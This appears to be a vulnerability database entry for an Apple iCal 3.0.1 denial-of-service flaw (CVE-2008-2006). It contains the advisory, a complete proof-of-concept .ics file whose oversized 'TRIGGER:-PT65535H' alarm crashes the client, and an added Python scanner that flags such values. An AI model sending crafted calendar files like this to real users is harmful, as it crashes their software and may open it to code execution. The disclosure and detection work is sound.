Apple iCal 'TRIGGER' Parameter Denial of Service Vulnerability

Vulnerability ID: 1115046    Vulnerability type: Input validation
Published: 2008-04-21    Updated: 2008-05-21
CVE: CVE-2008-2006    CNNVD-ID: CNNVD-200805-292
Platform: OSX    CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/31619
https://www.securityfocus.com/bid/28632
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-292
|Vulnerability details
Apple iCal 3.0.1 on Mac OS X allows remote CalDAV servers and user-assisted remote attackers to cause a denial of service (NULL pointer dereference and application crash) or possibly execute arbitrary code via an .ics file containing (1) a large 16-bit integer on a TRIGGER line or (2) a large integer in the COUNT field of an RRULE line.
|Vulnerability exploit (PoC)
source: http://www.securityfocus.com/bid/28632/info

Apple iCal is prone to a denial-of-service vulnerability because it fails to handle specially crafted files.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected.

BEGIN:VCALENDAR
X-WR-CALNAME:Fake event
PRODID:-//Apple Inc.//iCal 3.0//EN
CALSCALE:GREGORIAN
VERSION:2.0
METHOD:PUBLISH
BEGIN:VTIMEZONE
TZID:America/Buenos_Aires
BEGIN:DAYLIGHT
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:19991003T000000
RDATE:19991003T000000
TZNAME:ARST
END:DAYLIGHT
BEGIN:STANDARD
TZOFFSETFROM:-0300
TZOFFSETTO:-0300
DTSTART:20000303T000000
RDATE:20000303T000000
RDATE:20001231T210000
TZNAME:ART
END:STANDARD
END:VTIMEZONE
BEGIN:VEVENT
SEQUENCE:10
DTSTART;TZID=America/Buenos_Aires:20071225T000000
DTSTAMP:20071213T124414Z
SUMMARY:Fake Event
DTEND;TZID=America/Buenos_Aires:20071225T010000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
UID:651D31BE-455E-45ED-99C6-55B9F03A3FA9
TRANSP:OPAQUE
CREATED:20071213T124215Z
BEGIN:VALARM
X-WR-ALARMUID:958B6A5B-91E6-4F80-829F-89AD5B17AF49
ACTION:DISPLAY
DESCRIPTION:Event reminder
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
END:VCALENDAR
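As an added example that is not part of the advisory, the proof of concept, or Apple's code, the following Python scanner applies the input check the affected parser lacked: it unfolds an .ics file, splits each content line into property, parameters and value, and flags any TRIGGER duration component or RRULE COUNT that does not fit in a signed 16-bit integer. The 32767 limit, the `SAMPLE_ICS` input (constructed here; it reuses the PoC's `TRIGGER:-PT65535H` line beside a benign alarm and an oversized COUNT) and all function names are assumptions of this example; the advisory only says "large 16-bit integer" and gives no exact boundary.

```python
"""Flag oversized integers in .ics TRIGGER durations and RRULE COUNT fields.

Added example for CVE-2008-2006; not code from the advisory or from Apple.
"""
import re
from dataclasses import dataclass

# Assumed policy limit: reject anything that does not fit a signed 16-bit
# integer.  The advisory does not state the real boundary, so this is a guess.
INT16_MAX = 32767

# RFC 5545 dur-value: optional sign, "P", then W / D and an optional T H M S part.
DURATION_RE = re.compile(
    r"^([+-])?P(?:(\d+)W)?(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$"
)


@dataclass
class Finding:
    line_no: int   # first physical line of the offending content line
    prop: str      # property name, e.g. TRIGGER or RRULE
    reason: str


def unfold(text):
    """Join RFC 5545 folded lines; continuation lines begin with a space or tab.
    Returns (first_physical_line_number, logical_line) pairs."""
    lines = []
    for n, raw in enumerate(text.splitlines(), 1):
        if raw[:1] in (" ", "\t") and lines:
            first, body = lines[-1]
            lines[-1] = (first, body + raw[1:])
        else:
            lines.append((n, raw))
    return lines


def split_content_line(line):
    """'NAME;PARAM=X:VALUE' -> (NAME, {PARAM: X}, VALUE); None if there is no
    unquoted ':' separating name/params from the value."""
    in_quotes = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ":" and not in_quotes:
            head, value = line[:i], line[i + 1:]
            break
    else:
        return None
    name, *params = head.split(";")
    pmap = {}
    for p in params:
        k, _, v = p.partition("=")
        pmap[k.upper()] = v.strip('"')
    return name.upper(), pmap, value


def duration_components(value):
    """Integer components of a DURATION value, or None if it is not a duration."""
    m = DURATION_RE.match(value.strip())
    if not m:
        return None
    return [int(g) for g in m.groups()[1:] if g is not None]


def scan_ics(text, limit=INT16_MAX):
    """Return a Finding for every TRIGGER or RRULE line that carries an integer
    larger than `limit`, plus TRIGGER durations that do not parse at all."""
    findings = []
    for line_no, line in unfold(text):
        parsed = split_content_line(line)
        if parsed is None:
            continue
        name, params, value = parsed
        if name == "TRIGGER" and params.get("VALUE", "DURATION").upper() == "DURATION":
            comps = duration_components(value)
            if comps is None:
                findings.append(Finding(line_no, name, "unparseable duration %r" % value))
            elif any(c > limit for c in comps):
                findings.append(Finding(line_no, name, "duration component exceeds %d: %s" % (limit, value)))
        elif name == "RRULE":
            for part in value.split(";"):
                k, _, v = part.partition("=")
                if k.upper() == "COUNT" and v.isdigit() and int(v) > limit:
                    findings.append(Finding(line_no, name, "COUNT=%s exceeds %d" % (v, limit)))
    return findings


# Constructed sample: one benign alarm, the PoC's oversized TRIGGER, and an
# event whose RRULE COUNT is far beyond any 16-bit value.
SAMPLE_ICS = """BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:example-1
DTSTART;TZID=America/Buenos_Aires:20071225T000000
RRULE:FREQ=YEARLY;INTERVAL=1;COUNT=1
BEGIN:VALARM
ACTION:DISPLAY
TRIGGER:-PT15M
END:VALARM
BEGIN:VALARM
ACTION:DISPLAY
TRIGGER:-PT65535H
END:VALARM
END:VEVENT
BEGIN:VEVENT
UID:example-2
DTSTART:20080101T000000Z
RRULE:FREQ=DAILY;COUNT=4294967295
END:VEVENT
END:VCALENDAR
"""

if __name__ == "__main__":
    for f in scan_ics(SAMPLE_ICS):
        print("line %d %s: %s" % (f.line_no, f.prop, f.reason))
```

A CalDAV proxy or mail gateway could run `scan_ics` on inbound calendar data and quarantine any file that produces a finding before a vulnerable client parses it; the unfolding step matters because a folded line would otherwise hide the oversized value from a naive per-line grep.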
|Affected products
Apple iCal 3.0.1
|References
Source: XF
Name: ical-trigger-dos(42569)
Link: http://xforce.iss.net/xforce/xfdb/42569
Source: SECTRACK
Name: 1020094
Link: http://www.securitytracker.com/id?1020094
Source: BID
Name: 28632
Link: http://www.securityfocus.com/bid/28632
Source: BID
Name: 28629
Link: http://www.securityfocus.com/bid/28629
Source: BUGTRAQ
Name: 20080528 Re: CORE-2008-0126: Multiple vulnerabilities in iCal
Link: http://www.securityfocus.com/archive/1/archive/1/492682/100/0/threaded
Source: BUGTRAQ
Name: 20080527 Re: CORE-2008-0126: Multiple vulnerabilities in iCal
Link: http://www.securityfocus.com/archive/1/archive/1/492638/100/100/threaded
Source: BUGTRAQ
Name: 20080521 CORE-2008-0126: Multiple vulnerabilities in iCal
Link: http://www.securityfocus.com/archive/1/archive/1/492414/100/0/threaded
Source: VUPEN
Name: ADV-2008-1601
Link: http://www.frsirt.com/english/advisories/2008/1601
Source: MISC
Link: http://www.coresecurity.com/?action=item&id=2219
Source: SREASON
Name: 3901
Link: http://securityreason.com/securityalert/3901